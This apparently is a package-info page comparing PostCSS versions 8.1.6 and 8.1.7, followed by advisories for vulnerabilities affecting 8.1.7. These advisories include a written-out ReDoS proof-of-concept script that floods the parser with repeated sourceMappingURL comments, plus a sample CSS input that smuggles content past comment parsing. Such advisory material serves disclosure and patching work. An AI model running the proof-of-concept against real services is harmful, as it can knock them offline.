PostCSS version 8.1.7 is a minor update to the popular CSS transformation tool, succeeding version 8.1.6. Both versions, designed for developers, offer a powerful and extensible platform for manipulating CSS using JavaScript plugins. Key features like automatically adding vendor prefixes, linting, and future CSS syntax support remain consistent across both releases. Core dependencies, including nanoid, colorette, source-map, and line-column, are unchanged, ensuring a consistent development experience. The MIT license continues to provide developers with the freedom to use and modify the library.
The primary difference between 8.1.6 and 8.1.7 lies in internal improvements and bug fixes. While the core functionality is identical and no breaking changes are present, version 8.1.7 incorporates optimizations reflected in a slight increase in unpacked size from 197,211 bytes to 197,769 bytes, suggesting refined code or added assets. Developers upgrading from 8.1.6 to 8.1.7 can expect the same API and plugin compatibility. The later release date of November 10, 2020, compared to November 5, 2020, indicates that version 8.1.7 addresses any immediate issues identified in the earlier 8.1.6 release. Therefore, upgrading to 8.1.7 is recommended for developers seeking the most stable and up-to-date experience.
All the vulnerabilities related to the version 8.1.7 of the package
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.